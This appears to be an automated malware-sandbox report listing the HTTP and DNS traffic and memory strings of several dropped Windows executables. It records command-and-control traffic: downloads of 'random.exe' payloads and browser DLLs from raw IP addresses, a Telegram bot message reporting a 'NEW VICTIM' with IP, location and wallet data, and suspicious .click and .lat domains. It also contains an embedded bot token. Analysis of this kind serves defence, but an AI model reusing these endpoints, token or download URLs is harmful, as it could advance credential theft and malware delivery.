                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKDhygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKDhygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2,es_dfp:72fefd38 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddllog?async=doodle:306735258,slot:22,type:1,cta:0 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/Krokodyl02/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /niCGMfnfOxUBXxpLhBBB1734796753?argument=sqcim1nDAay1ts2z1734830229 HTTP/1.1Host: home.fivetk5sb.topAccept: */*
                              Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 4-1b5020b1c2a0"},"nmmhkkegccagdldgiimedpiccmgmieda":{"cohort":"1::","cohortname":"","dlrc":6120,"installdate":6120,"pf":"dcb37f49-aa68-4ebc-a8d4-14eaa556e331"}}},"web_app":{"app_id":{"install_url":{"aghbiahbpaijignceidepookljebhfak":["https://drive.google.com/drive/installwebapp?usp=chrome_default"],"agimnkijcaahngcdmfeangaknmldooml":["https://www.youtube.com/s/notifications/manifest/cr_install.html"],"fhihpiojkbmbpdjeoajapmgkhlnakfjf":["https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default"],"fmgjjmmmlfnkbppncabfkddbjimcfncm":["https://mail.google.com/mail/installwebapp?usp=chrome_default"],"kefjledonklijopmnomlcbpllchaibag":["https://docs.google.com/presentation/installwebapp?usp=chrome_default"],"mpnpojknpmmopombnjdcgaaiekajbnjb":["https://docs.google.com/document/installwebapp?usp=chrome_default"]}}},"web_apps":{"did_migrate_default_chrome_apps":["MigrateDefaultChromeAppToWebAppsGSuite","MigrateDefaultChromeAppToWebAppsNonGSuite"],"last_preinstall_synchronize_version":"117","migrated_default_apps":["aohghmighlieiainnegkcijnfilokake","aapocclcgogkmnckokdopfmhonfmgoek","felcaaldnbdncclmgdcncolpebgiejap","apdfllckaahabafndbhieahigkjlhalf","pjkljhegncpnkpknbcohdijeoejaedia","blpcfgokakmgnkcojhhkbfbldkacnbeo"]},"zerosuggest":{"cachedresults":")]}'\n[\"\",[\"one piece chapter 1094 spoilers twitter\",\"baltimore drinking water parasites\",\"assassin creed mirage release\",\"rwd tesla model y\",\"michigan hockey johnny druskinis\",\"loki season 2 jonathan majors\",\"google pixel 8 pro leaks\",\"amazon prime deals prime day\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[],{\"google:clientdata\":{\"bpc\":false,\"tlw\":false},\"google:groupsinfo\":\"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\\u003d\",\"google:suggestdetail\":[{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002}],\"google:suggestrelevance\":[1257,1256,1255,1254,1253,1252,1251,1250],\"google:suggestsubtypes\":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],\"google:suggesttype\":[\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\"]}]"}} equals www.youtube.com (Youtube)
                              Source: cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: da":{"cohort":"1::","cohortname":"","dlrc":6120,"installdate":6120,"pf":"dcb37f49-aa68-4ebc-a8d4-14eaa556e331"}}},"web_app":{"app_id":{"install_url":{"aghbiahbpaijignceidepookljebhfak":["https://drive.google.com/drive/installwebapp?usp=chrome_default"],"agimnkijcaahngcdmfeangaknmldooml":["https://www.youtube.com/s/notifications/manifest/cr_install.html"],"fhihpiojkbmbpdjeoajapmgkhlnakfjf":["https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default"],"fmgjjmmmlfnkbppncabfkddbjimcfncm":["https://mail.google.com/mail/installwebapp?usp=chrome_default"],"kefjledonklijopmnomlcbpllchaibag":["https://docs.google.com/presentation/installwebapp?usp=chrome_default"],"mpnpojknpmmopombnjdcgaaiekajbnjb":["https://docs.google.com/document/installwebapp?usp=chrome_default"]}}},"web_apps":{"did_migrate_default_chrome_apps":["MigrateDefaultChromeAppToWebAppsGSuite","MigrateDefaultChromeAppToWebAppsNonGSuite"],"last_preinstall_synchronize_version":"117","migrated_default_apps":["aohghmighlieiainnegkcijnfilokake","aapocclcgogkmnckokdopfmhonfmgoek","felcaaldnbdncclmgdcncolpebgiejap","apdfllckaahabafndbhieahigkjlhalf","pjkljhegncpnkpknbcohdijeoejaedia","blpcfgokakmgnkcojhhkbfbldkacnbeo"]},"zerosuggest":{"cachedresults":")]}'\n[\"\",[\"one piece chapter 1094 spoilers twitter\",\"baltimore drinking water parasites\",\"assassin creed mirage release\",\"rwd tesla model y\",\"michigan hockey johnny druskinis\",\"loki season 2 jonathan majors\",\"google pixel 8 pro leaks\",\"amazon prime deals prime day\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[],{\"google:clientdata\":{\"bpc\":false,\"tlw\":false},\"google:groupsinfo\":\"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\\u003d\",\"google:suggestdetail\":[{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002}],\"google:suggestrelevance\":[1257,1256,1255,1254,1253,1252,1251,1250],\"google:suggestsubtypes\":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],\"google:suggesttype\":[\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\"]}]"}}chedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340886957835794","type":2,"window_count":0},{"crashed":false,"time":"13340886960923866","type":0},{"did_schedule_command":true,"first_session_service":true,"tab_count":1,"time":"13340886965177921","type":2,"window_count":1},{"crashed":false,"time":"13340890857002147","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890857032656","type":2,"window_count":0},{"crashed":false,"time":"13340890860222296","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890860225507","type":2,"window_count":0},{"crashed":false,"time":"13340890862208495","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890862220490","type":2,"window_count":0},{"crashed":false,"time"
                              Source: global trafficDNS traffic detected: DNS query: pancakedipyps.click
                              Source: global trafficDNS traffic detected: DNS query: cheapptaxysu.click
                              Source: global trafficDNS traffic detected: DNS query: drive.google.com
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                              Source: global trafficDNS traffic detected: DNS query: httpbin.org
                              Source: global trafficDNS traffic detected: DNS query: home.fivetk5sb.top
                              Source: global trafficDNS traffic detected: DNS query: fivetk5sb.top
                              Source: global trafficDNS traffic detected: DNS query: www.google.com
                              Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                              Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                              Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                              Source: global trafficDNS traffic detected: DNS query: fieldhitty.click
                              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
                              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Dec 2024 01:16:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlDZeF9DSsj%2Fah99ZkjP8hZIUWe5uI49e4RkUM5kg%2BD2%2Fhbyj2xSFtBXOyVLqtRH%2BlxjFeJe91Urc6S0cUS%2Fis30X9e8l1t6U%2FzeUl4z9RJDyZJ4CnR6TpNjJB%2FizkzD7gTGMX0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f5c4474fce34328-EWR
                              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Dec 2024 01:18:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SSQSxv7PYjbu6zdvJ61%2FOvdzgJVvlHWxFLuiiY6PRfx2TI4q0Ktga0pdm1WdZgB%2BdVlBJbih4%2BYSeVsQ8B9h8KuG4vRFJqXTkwx4BtA3uPP%2FemmxuUhyVnLCO%2B8avts6eD46%2Bc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f5c47d80cdb4385-EWR
                              Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: http://.css
                              Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: http://.jpg
                              Source: c9d0f96e57.exe, 0000001F.00000003.3795841933.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download
                              Source: c9d0f96e57.exe, 0000001F.00000003.3768476028.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3795841933.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadGF
                              Source: c9d0f96e57.exe, 0000001F.00000003.3680983757.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3736647835.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3711012668.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3655522323.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3768476028.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3795841933.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadKFo
                              Source: c9d0f96e57.exe, 0000001F.00000003.3736647835.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3711012668.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3768476028.000000000595C000.00000004.00000020.00020000.00000000.sdmp, c9d0f96e57.exe, 0000001F.00000003.3795841933.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloaduFi
                              Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                              Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                              Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                              Source: cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
